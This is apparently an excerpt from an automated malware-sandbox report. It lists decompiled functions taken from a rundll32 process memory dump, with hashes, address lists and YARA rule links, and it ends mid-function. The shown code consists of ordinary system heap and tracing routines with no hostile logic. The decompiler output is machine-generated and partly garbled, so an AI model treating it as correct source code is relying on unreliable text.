                                                                                            • Opcode Fuzzy Hash: b2775e2b7955a173f1a8547d6e551bf44c911cace3841511afe959d07a360ece
                                                                                            • Instruction Fuzzy Hash: ADF02766411294BAEF327F25A1242F62BC8C795114B0928CAD45017300F4BDBC83CA34
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046A8D34 Relevance: .0, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 43%
                                                                                            			E046A8D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x46cd360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E045F7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0461B640(E04619AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                            0x046a8d34
                                                                                            0x046a8d43
                                                                                            0x046a8d4b
                                                                                            0x046a8d4e
                                                                                            0x046a8d52
                                                                                            0x046a8d5c
                                                                                            0x046a8d6e
                                                                                            0x046a8d5e
                                                                                            0x046a8d67
                                                                                            0x046a8d67
                                                                                            0x046a8d79
                                                                                            0x046a8d7a
                                                                                            0x046a8d7c
                                                                                            0x046a8d81
                                                                                            0x046a8d94

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 39afc86c30b69f0902341e7db425490e96749d18b7ec9e43024c84d37fed4862
                                                                                            • Instruction ID: 59a30bab355b78982dbfa06acbb6f69608862c527b6946478946ca49b3c60505
                                                                                            • Opcode Fuzzy Hash: 39afc86c30b69f0902341e7db425490e96749d18b7ec9e43024c84d37fed4862
                                                                                            • Instruction Fuzzy Hash: 4CF09070A04608AFD704EBA8D441A6E77B4EB18700F5080AAE905EB290EA38E900CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0461927A Relevance: .0, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 54%
                                                                                            			E0461927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0461FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E046192C6(_t11, _t14);
				}
				return _t11;
			}





                                                                                            0x04619295
                                                                                            0x04619299
                                                                                            0x0461929f
                                                                                            0x046192aa
                                                                                            0x046192ad
                                                                                            0x046192ae
                                                                                            0x046192af
                                                                                            0x046192b0
                                                                                            0x046192b4
                                                                                            0x046192bb
                                                                                            0x046192bb
                                                                                            0x046192c5

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                            • Instruction ID: 611bc891e145fc8dfe82f6319e06133f8fcfaa7df1b2c850147a2b21cc287815
                                                                                            • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                            • Instruction Fuzzy Hash: FFE0ED722406406BEB219E0ACC80B0336A9AF82724F08407DB9041E292CAEAE908C7A4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045F746D Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 88%
                                                                                            			E045F746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E045EEB70(__ecx, 0x46c79a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E046195D0();
							L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                                            0x045f746d
                                                                                            0x045f746d
                                                                                            0x045f746d
                                                                                            0x045f7471
                                                                                            0x045f7488
                                                                                            0x0463f92d
                                                                                            0x045f748e
                                                                                            0x045f7491
                                                                                            0x045f7495
                                                                                            0x0463f937
                                                                                            0x0463f93a
                                                                                            0x0463f94e
                                                                                            0x0463f953
                                                                                            0x0463f956
                                                                                            0x0463f956
                                                                                            0x045f7495
                                                                                            0x00000000
                                                                                            0x045f7488
                                                                                            0x045f7473
                                                                                            0x045f7478
                                                                                            0x045f747d
                                                                                            0x045f7481
                                                                                            0x00000000
                                                                                            0x045f7481
                                                                                            0x045f747d
                                                                                            0x045f747a
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fb5afd4b394d04503cd7463d9ab60fc993d332e41c6fb27cfdeddeefed75235e
                                                                                            • Instruction ID: 8cd779930bdcffa7401ce8d540775c30972b41774f0341d29f0157b861ece5d5
                                                                                            • Opcode Fuzzy Hash: fb5afd4b394d04503cd7463d9ab60fc993d332e41c6fb27cfdeddeefed75235e
                                                                                            • Instruction Fuzzy Hash: 47F0E934A00145AADF059B68CC44F797FB1BF0C358F040E99D651A7160F725B802EB97
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046A8CD6 Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 36%
                                                                                            			E046A8CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x46cd360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E045F7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0461B640(E04619AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                            0x046a8ce5
                                                                                            0x046a8ced
                                                                                            0x046a8cf0
                                                                                            0x046a8cfb
                                                                                            0x046a8d0d
                                                                                            0x046a8cfd
                                                                                            0x046a8d06
                                                                                            0x046a8d06
                                                                                            0x046a8d18
                                                                                            0x046a8d19
                                                                                            0x046a8d1b
                                                                                            0x046a8d20
                                                                                            0x046a8d33

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 58f477aa0f11cbda842cb5797754f52a00de4c012d76e3efb3c8d841312cdd68
                                                                                            • Instruction ID: aa5eea7a2a7ddf9145335601db72a389aee8b0c40c4da9905f1be64c60a68df3
                                                                                            • Opcode Fuzzy Hash: 58f477aa0f11cbda842cb5797754f52a00de4c012d76e3efb3c8d841312cdd68
                                                                                            • Instruction Fuzzy Hash: CFF0E270A04608ABDB00EBA8D845E6E77B4EF18304F14019AE906EB390FA38ED00CB58
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046A8B58 Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 36%
                                                                                            			E046A8B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x46cd360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E045F7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E0461B640(E04619AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                            0x046a8b67
                                                                                            0x046a8b6f
                                                                                            0x046a8b72
                                                                                            0x046a8b7d
                                                                                            0x046a8b8f
                                                                                            0x046a8b7f
                                                                                            0x046a8b88
                                                                                            0x046a8b88
                                                                                            0x046a8b9a
                                                                                            0x046a8b9b
                                                                                            0x046a8b9d
                                                                                            0x046a8ba2
                                                                                            0x046a8bb5

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a512428414431b12ddd37d134cdf68e5a51e552ab8c90761916e5e54ed4e9b1e
                                                                                            • Instruction ID: 05d76b1eb3395e6547aa6a753f4957482ae790c4cbf2827ddfb4641826b4b9eb
                                                                                            • Opcode Fuzzy Hash: a512428414431b12ddd37d134cdf68e5a51e552ab8c90761916e5e54ed4e9b1e
                                                                                            • Instruction Fuzzy Hash: 38F082B0A04659ABEB00EBA8D916E7E73B4FF08704F440459BA05DB390FA34ED04C798
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045D4F2E Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E045D4F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E046A88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E045FC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x45b1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                                            0x045d4f2e
                                                                                            0x045d4f34
                                                                                            0x045d4f38
                                                                                            0x04630b85
                                                                                            0x04630b85
                                                                                            0x04630b89
                                                                                            0x04630b9a
                                                                                            0x04630b9a
                                                                                            0x04630b9f
                                                                                            0x00000000
                                                                                            0x04630b9f
                                                                                            0x04630b94
                                                                                            0x04630b98
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x04630b98
                                                                                            0x045d4f3e
                                                                                            0x045d4f48
                                                                                            0x00000000
                                                                                            0x045d4f6e
                                                                                            0x00000000
                                                                                            0x045d4f70

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 743b93d4e2b579c78fdc4197824807e269b878929600b898ef1321764b9fce29
                                                                                            • Instruction ID: c52a48f95f34f9bbcbb25e905f288ddcd31dd147f81042b18b15d9eb4f845748
                                                                                            • Opcode Fuzzy Hash: 743b93d4e2b579c78fdc4197824807e269b878929600b898ef1321764b9fce29
                                                                                            • Instruction Fuzzy Hash: BCF0E232925ADA8FE771DB18C140B22B7D4BF247B9F0444B4D40687B28E735FC48C680
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0460A44B Relevance: .0, Instructions: 29COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0460A44B(signed int __ecx) {
				intOrPtr _t13;
				signed int _t15;
				signed int* _t16;
				signed int* _t17;

				_t13 =  *0x46c7b9c; // 0x0
				_t15 = __ecx;
				_t16 = L045F4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
				if(_t16 == 0) {
					return 0;
				}
				 *_t16 = _t15;
				_t17 =  &(_t16[2]);
				E0461FA60(_t17, 0, _t15 << 2);
				return _t17;
			}







                                                                                            0x0460a44b
                                                                                            0x0460a453
                                                                                            0x0460a472
                                                                                            0x0460a476
                                                                                            0x00000000
                                                                                            0x0460a493
                                                                                            0x0460a47a
                                                                                            0x0460a47f
                                                                                            0x0460a486
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 326625f4fc8e86ca4b38539394fb82aa1e613684087ff6faa7875e760aa3adae
                                                                                            • Instruction ID: d70e601a6115bbecd031bbc06793ee8710b89cfda21a4463c4bc26dcd25f52b7
                                                                                            • Opcode Fuzzy Hash: 326625f4fc8e86ca4b38539394fb82aa1e613684087ff6faa7875e760aa3adae
                                                                                            • Instruction Fuzzy Hash: 67E09272A41521ABD3115E58ED00F6773ADEBF5655F094039F504C7250E628ED02C7E0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045DF358 Relevance: .0, Instructions: 28COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 79%
                                                                                            			E045DF358(void* __ecx, signed int __edx) {
				char _v8;
				signed int _t9;
				void* _t20;

				_push(__ecx);
				_t9 = 2;
				_t20 = 0;
				if(E0460F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
					_t20 = L045F4620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				}
				return _t20;
			}






                                                                                            0x045df35d
                                                                                            0x045df361
                                                                                            0x045df367
                                                                                            0x045df372
                                                                                            0x045df38c
                                                                                            0x045df38c
                                                                                            0x045df394

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                            • Instruction ID: 6f2e8b676c1efaa16fd38b67812919fea0ed2cdfed50f69e159bfcef7c7dcdd2
                                                                                            • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                                                                            • Instruction Fuzzy Hash: 0CE0D833A40118BBDB3597DDAD05F5BBBACEB44B60F054155B904D7150D560AE00D7D1
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 045EFF60 Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E045EFF60(intOrPtr _a4) {
				void* __ecx;
				void* __ebp;
				void* _t13;
				intOrPtr _t14;
				void* _t15;
				void* _t16;
				void* _t17;

				_t14 = _a4;
				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x45b11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					return E046A88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
				} else {
					return E045F0050(_t14);
				}
			}










                                                                                            0x045eff66
                                                                                            0x045eff6b
                                                                                            0x00000000
                                                                                            0x045eff8f
                                                                                            0x00000000
                                                                                            0x045eff8f

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: ae71c3ac81475015a409c14080e555796509b27862226dc7e067a6fbe12a127a
                                                                                            • Instruction ID: 3617cc2b9e895254c2ef5d545fc3ecca9ab1d913d84cc34686dc373818adfbc7
                                                                                            • Opcode Fuzzy Hash: ae71c3ac81475015a409c14080e555796509b27862226dc7e067a6fbe12a127a
                                                                                            • Instruction Fuzzy Hash: EDE09AB2205244AFEB38DB92E150F353798BF46625F19841DE4184B102FA21F880E74A
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046641E8 Relevance: .0, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 82%
                                                                                            			E046641E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t5;
				void* _t14;

				_push(8);
				_push(0x46b08f0);
				_t5 = E0462D08C(__ebx, __edi, __esi);
				if( *0x46c87ec == 0) {
					E045EEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
					if( *0x46c87ec == 0) {
						 *0x46c87f0 = 0x46c87ec;
						 *0x46c87ec = 0x46c87ec;
						 *0x46c87e8 = 0x46c87e4;
						 *0x46c87e4 = 0x46c87e4;
					}
					 *(_t14 - 4) = 0xfffffffe;
					_t5 = L04664248();
				}
				return E0462D0D1(_t5);
			}





                                                                                            0x046641e8
                                                                                            0x046641ea
                                                                                            0x046641ef
                                                                                            0x046641fb
                                                                                            0x04664206
                                                                                            0x0466420b
                                                                                            0x04664216
                                                                                            0x0466421d
                                                                                            0x04664222
                                                                                            0x0466422c
                                                                                            0x04664231
                                                                                            0x04664231
                                                                                            0x04664236
                                                                                            0x0466423d
                                                                                            0x0466423d
                                                                                            0x04664247

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6186fc43872d71f45d203db972ebe105c91794ee7e06fec69230e980b2e37624
                                                                                            • Instruction ID: ec6656285b95a316a12615c51e6d47b570a44fdc46228f037ddf21cd826772d7
                                                                                            • Opcode Fuzzy Hash: 6186fc43872d71f45d203db972ebe105c91794ee7e06fec69230e980b2e37624
                                                                                            • Instruction Fuzzy Hash: 4CF01C74491700DFEB70FF66D5047AC36A8F744316F116119800187298F7386980CFA9
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0468D380 Relevance: .0, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0468D380(void* __ecx, void* __edx, intOrPtr _a4) {
				void* _t5;

				if(_a4 != 0) {
					_t5 = L045DE8B0(__ecx, _a4, 0xfff);
					L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
					return _t5;
				}
				return 0xc000000d;
			}




                                                                                            0x0468d38a
                                                                                            0x0468d39b
                                                                                            0x0468d3b1
                                                                                            0x00000000
                                                                                            0x0468d3b6
                                                                                            0x00000000

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                            • Instruction ID: 8b19bf418a1a191a9a9922fe54843dc0cb0a409245e311247eab944cadd2c728
                                                                                            • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                                                                            • Instruction Fuzzy Hash: B6E0C231281A45BBEB226E44CC00FA97B16EF917A5F104035FE085A7D0DA75BC92E6D4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 0460A185 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E0460A185() {
				void* __ecx;
				intOrPtr* _t5;

				if( *0x46c67e4 >= 0xa) {
					if(_t5 < 0x46c6800 || _t5 >= 0x46c6900) {
						return L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
					} else {
						goto L1;
					}
				} else {
					L1:
					return E045F0010(0x46c67e0, _t5);
				}
			}





                                                                                            0x0460a190
                                                                                            0x0460a1a6
                                                                                            0x0460a1c2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0460a192
                                                                                            0x0460a192
                                                                                            0x0460a19f
                                                                                            0x0460a19f

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d8668b54e3423527557ee2f1a979d13f35cc3e41cdc32b146baaab768ce0a52d
                                                                                            • Instruction ID: e66b8d3a0a46d18748be2dc8a93240ab18c5548a18f6401a6f1760c5cf748b0e
                                                                                            • Opcode Fuzzy Hash: d8668b54e3423527557ee2f1a979d13f35cc3e41cdc32b146baaab768ce0a52d
                                                                                            • Instruction Fuzzy Hash: 31D0C2211621401AF71C1B40ED14B722212E7D8748F208C4CE3020A5D0F960F8D4915D
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046016E0 Relevance: .0, Instructions: 17COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E046016E0(void* __edx, void* __eflags) {
				void* __ecx;
				void* _t3;

				_t3 = E04601710(0x46c67e0);
				if(_t3 == 0) {
					_t6 =  *[fs:0x30];
					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
						goto L1;
					} else {
						return L045F4620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
					}
				} else {
					L1:
					return _t3;
				}
			}





                                                                                            0x046016e8
                                                                                            0x046016ef
                                                                                            0x046016f3
                                                                                            0x046016fe
                                                                                            0x00000000
                                                                                            0x04601700
                                                                                            0x0460170d
                                                                                            0x0460170d
                                                                                            0x046016f2
                                                                                            0x046016f2
                                                                                            0x046016f2
                                                                                            0x046016f2

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 07f016511be375cac3c9e152abce4a27e540c74102e89fe75107a7716a0b4b60
                                                                                            • Instruction ID: db0adb719b73478533546da1997c9381dc9388429fdaa6ede8694c6401e5e1ec
                                                                                            • Opcode Fuzzy Hash: 07f016511be375cac3c9e152abce4a27e540c74102e89fe75107a7716a0b4b60
                                                                                            • Instruction Fuzzy Hash: DED0A73129010096FE2D5B149C14B562251EBD2789F38005CF217595C0EFA2FD92E45C
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 046553CA Relevance: .0, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E046553CA(void* __ebx) {
